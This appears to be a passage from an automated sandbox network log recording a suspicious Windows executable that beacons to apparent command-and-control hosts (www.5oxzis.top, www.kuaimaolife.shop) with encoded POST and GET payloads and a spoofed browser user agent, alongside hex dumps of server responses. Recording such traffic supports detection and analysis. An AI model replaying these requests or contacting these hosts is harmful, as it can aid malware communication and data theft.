70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Sep 27, 2024 09:08:23.600482941 CEST	1236	IN	Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
Sep 27, 2024 09:08:23.600519896 CEST	448	IN	Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
Sep 27, 2024 09:08:23.600550890 CEST	1236	IN	Data Raw: 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b Data Ascii: olor:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-weight: bold;">English</s
Sep 27, 2024 09:08:23.600586891 CEST	527	IN	Data Raw: 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 Data Ascii: .</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web è appena stato attivato. Ancora non c'è contenuto.</div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49717	20.2.217.253	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:31.226924896 CEST	648	OUT	POST /6tyq/ HTTP/1.1 Host: www.5oxzis.top Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.5oxzis.top Referer: http://www.5oxzis.top/6tyq/ Connection: close Content-Length: 203 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 75 6c 4b 58 78 53 78 51 36 51 66 35 71 36 41 2b 4d 35 37 63 4f 4f 73 79 55 61 2b 62 56 50 2f 64 41 51 30 36 30 62 62 6b 44 57 41 4e 52 6d 68 64 45 4f 63 74 34 59 53 5a 7a 44 34 50 70 61 61 54 51 50 47 77 57 71 4a 79 63 69 35 61 76 71 4e 50 55 32 72 72 6e 31 2b 77 48 58 56 49 47 36 7a 50 61 64 47 4c 75 72 66 4c 48 6b 67 4e 36 48 55 65 59 49 6e 6e 67 6d 61 47 72 33 41 6e 4d 6b 70 4c 4c 53 6d 7a 52 46 69 4e 32 31 67 72 67 6e 45 53 37 4f 64 4f 34 5a 74 62 51 56 61 44 76 46 4e 74 39 44 66 72 4e 55 58 63 4e 48 68 6c 47 59 59 36 50 4b 6b 54 63 4e 6f 6d 44 53 76 4f 61 55 61 39 49 74 54 4e 41 33 73 3d Data Ascii: jz=ulKXxSxQ6Qf5q6A+M57cOOsyUa+bVP/dAQ060bbkDWANRmhdEOct4YSZzD4PpaaTQPGwWqJyci5avqNPU2rrn1+wHXVIG6zPadGLurfLHkgN6HUeYInngmaGr3AnMkpLLSmzRFiN21grgnES7OdO4ZtbQVaDvFNt9DfrNUXcNHhlGYY6PKkTcNomDSvOaUa9ItTNA3s=
Sep 27, 2024 09:08:32.105614901 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:31 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	20.2.217.253	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:33.772583961 CEST	668	OUT	POST /6tyq/ HTTP/1.1 Host: www.5oxzis.top Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.5oxzis.top Referer: http://www.5oxzis.top/6tyq/ Connection: close Content-Length: 223 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 75 6c 4b 58 78 53 78 51 36 51 66 35 71 65 38 2b 66 61 6a 63 66 2b 73 78 52 61 2b 62 61 76 2f 52 41 51 34 36 30 61 66 53 57 77 34 4e 55 33 39 64 46 4c 67 74 35 59 53 5a 6e 7a 34 4f 6d 36 61 49 51 50 4b 4f 57 72 31 79 63 69 64 61 76 6f 6c 50 55 6c 7a 71 6c 6c 2b 79 4b 33 56 4f 4d 61 7a 50 61 64 47 4c 75 72 4b 67 48 6b 6f 4e 36 30 63 65 61 70 6e 6d 37 47 61 46 39 48 41 6e 61 55 6f 6a 4c 53 6d 42 52 45 4f 7a 32 7a 6b 72 67 6c 63 53 38 66 64 42 74 4a 74 5a 50 6c 62 32 6c 6e 70 6b 31 31 48 58 41 58 32 6f 56 31 6c 2b 48 75 31 51 56 6f 73 37 50 74 45 65 54 42 6e 35 4c 6b 37 55 53 4f 44 39 65 67 34 52 61 6b 70 6d 64 55 4e 38 6f 5a 64 68 75 6f 38 39 53 67 79 55 Data Ascii: jz=ulKXxSxQ6Qf5qe8+fajcf+sxRa+bav/RAQ460afSWw4NU39dFLgt5YSZnz4Om6aIQPKOWr1ycidavolPUlzqll+yK3VOMazPadGLurKgHkoN60ceapnm7GaF9HAnaUojLSmBREOz2zkrglcS8fdBtJtZPlb2lnpk11HXAX2oV1l+Hu1QVos7PtEeTBn5Lk7USOD9eg4RakpmdUN8oZdhuo89SgyU
Sep 27, 2024 09:08:34.633534908 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:34 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49719	20.2.217.253	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:36.320971012 CEST	1685	OUT	POST /6tyq/ HTTP/1.1 Host: www.5oxzis.top Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.5oxzis.top Referer: http://www.5oxzis.top/6tyq/ Connection: close Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 75 6c 4b 58 78 53 78 51 36 51 66 35 71 65 38 2b 66 61 6a 63 66 2b 73 78 52 61 2b 62 61 76 2f 52 41 51 34 36 30 61 66 53 57 77 77 4e 49 56 31 64 46 6f 49 74 36 59 53 5a 6b 7a 34 4c 6d 36 62 4b 51 50 53 53 57 72 34 46 63 6b 5a 61 75 4c 64 50 42 6b 7a 71 2f 31 2b 79 57 48 56 50 47 36 7a 65 61 63 32 50 75 72 61 67 48 6b 6f 4e 36 31 4d 65 65 34 6e 6d 35 47 61 47 72 33 41 72 4d 6b 70 4f 4c 53 65 37 52 45 4c 49 32 6a 45 72 67 46 4d 53 2b 74 46 42 73 70 74 66 4d 6c 62 75 6c 6e 55 38 31 78 75 37 41 57 43 47 56 33 31 2b 47 36 63 72 46 62 78 69 4e 4d 6f 68 65 41 47 66 53 54 72 71 50 4e 2f 70 65 53 74 79 62 57 6b 4e 65 7a 4e 77 6b 34 30 62 30 39 41 4f 44 57 44 66 39 4d 76 64 73 48 68 54 73 51 52 48 6d 76 58 38 4c 55 46 45 39 2b 43 59 71 4d 4c 78 43 5a 79 50 6b 4a 5a 51 55 77 57 52 36 34 61 4e 4e 2b 6f 42 6a 4d 43 79 6b 63 49 6d 57 38 57 71 44 44 41 76 66 6f 45 79 33 6c 65 4a 72 65 69 76 65 71 69 70 61 61 2f 6b 50 49 41 7a 69 75 61 30 7a 4a 7a 55 37 68 54 37 76 4c 44 7a 4a 59 69 4d 32 34 53 56 46 38 2b [TRUNCATED] Data Ascii: jz=ulKXxSxQ6Qf5qe8+fajcf+sxRa+bav/RAQ460afSWwwNIV1dFoIt6YSZkz4Lm6bKQPSSWr4FckZauLdPBkzq/1+yWHVPG6zeac2PuragHkoN61Mee4nm5GaGr3ArMkpOLSe7RELI2jErgFMS+tFBsptfMlbulnU81xu7AWCGV31+G6crFbxiNMoheAGfSTrqPN/peStybWkNezNwk40b09AODWDf9MvdsHhTsQRHmvX8LUFE9+CYqMLxCZyPkJZQUwWR64aNN+oBjMCykcImW8WqDDAvfoEy3leJreiveqipaa/kPIAziua0zJzU7hT7vLDzJYiM24SVF8+QzMkTEfGZwEDC3P5y+dzCHMcbpYfgG/JawJw2Q6wixXlR9/im+q6fVcc9Hc4feZ5ei9LJ0ytNQjTjS7kgOe2a+LUEfrnYhoSrFUQw81wa2qiyyAlaksI/M4v25ldRyQXEeEInqN7AREipOwkRGNSKun+4HukyawsIr7+sd1aoe64pr6C96cyjI+J0vT5tg0dHznYPVEAjRqTQIALm3p3ASI2iR97S8CyuYDUvpUGk+a+lqHHQyK8t0FnGBS5d/JyUAb5wsAVbYaQtY1YbbIbE3ltp0x9OWWBQfJvtgfNwBNEg1Lgu+tlK270NBx8yJ1bwn3R6au/Z9AWO2y3OJj6A8MFID0thUrCViJFXEVcBBZbnMolR8ZP4qwDHrvc+rAPb3GCTytTCCh93NznGHKoUIHhLvVPFAD/YzGkv8RFoBaUfd8zLJ5+OEtG/6ZYFWFGe1P72EmOq2DP10o9ysVOx/e8ovIVnomM0QLj7YXWVk0mrBztXbOY9gCd+yhH6W1ep9Zlev5IgJsPVz3HxL1/Ll8OeoBe8MXvpgA5e1bvSm3sQgAPCcdUnjZjDNSiJ55DB2P4KdYbqIFzJDHSnHoLD+xmlwimA6xoB7brra7q+hyL4UseyXktBkfVvehBjj4YiagjOBBBZBTFxR1ApU9WqfuIhkPfa6JPpg [TRUNCATED]
Sep 27, 2024 09:08:37.182132959 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:37 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	20.2.217.253	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:38.863893986 CEST	400	OUT	GET /6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX HTTP/1.1 Host: www.5oxzis.top Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Sep 27, 2024 09:08:39.718422890 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:39 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49721	38.55.251.233	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:45.241005898 CEST	666	OUT	POST /j39u/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/j39u/ Connection: close Content-Length: 203 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 55 33 70 51 42 55 65 63 42 35 5a 66 4b 4e 6e 73 2b 51 30 48 71 46 78 44 6c 55 46 71 75 2f 67 66 51 67 42 74 4a 51 6b 72 4e 41 68 62 59 66 48 2f 39 51 30 73 36 44 4c 54 66 6b 50 69 66 69 71 68 7a 42 53 52 46 6d 74 42 67 48 64 31 50 32 50 58 4e 75 47 31 41 4a 6d 66 62 4c 50 52 38 36 78 74 2f 44 6e 51 68 37 51 2b 4a 6a 4a 48 44 33 6f 57 69 6d 50 2b 6b 4d 69 30 45 62 38 4a 6d 51 4b 2f 79 53 57 6f 31 55 50 44 52 38 65 43 32 79 34 63 55 4e 39 6d 6a 6f 73 50 5a 69 76 37 54 64 67 72 65 5a 78 64 54 34 2b 4c 53 34 4e 2b 39 73 77 44 46 54 45 46 55 52 52 70 2f 65 6f 3d Data Ascii: jz=Mxd/3qPWYHfxU3pQBUecB5ZfKNns+Q0HqFxDlUFqu/gfQgBtJQkrNAhbYfH/9Q0s6DLTfkPifiqhzBSRFmtBgHd1P2PXNuG1AJmfbLPR86xt/DnQh7Q+JjJHD3oWimP+kMi0Eb8JmQK/ySWo1UPDR8eC2y4cUN9mjosPZiv7TdgreZxdT4+LS4N+9swDFTEFURRp/eo=
Sep 27, 2024 09:08:46.112279892 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:45 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49722	38.55.251.233	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:47.788252115 CEST	686	OUT	POST /j39u/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/j39u/ Connection: close Content-Length: 223 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 58 55 78 51 4e 58 6d 63 51 4a 5a 51 57 39 6e 73 30 77 30 44 71 46 74 44 6c 56 41 76 76 4b 49 66 51 43 5a 74 4b 52 6b 72 4d 41 68 62 54 2f 48 36 33 77 30 6a 36 44 47 6d 66 6c 6a 69 66 69 75 68 7a 45 75 52 46 52 52 4f 68 58 64 7a 61 6d 50 56 51 65 47 31 41 4a 6d 66 62 4c 61 30 38 36 70 74 2f 77 50 51 6e 61 51 39 58 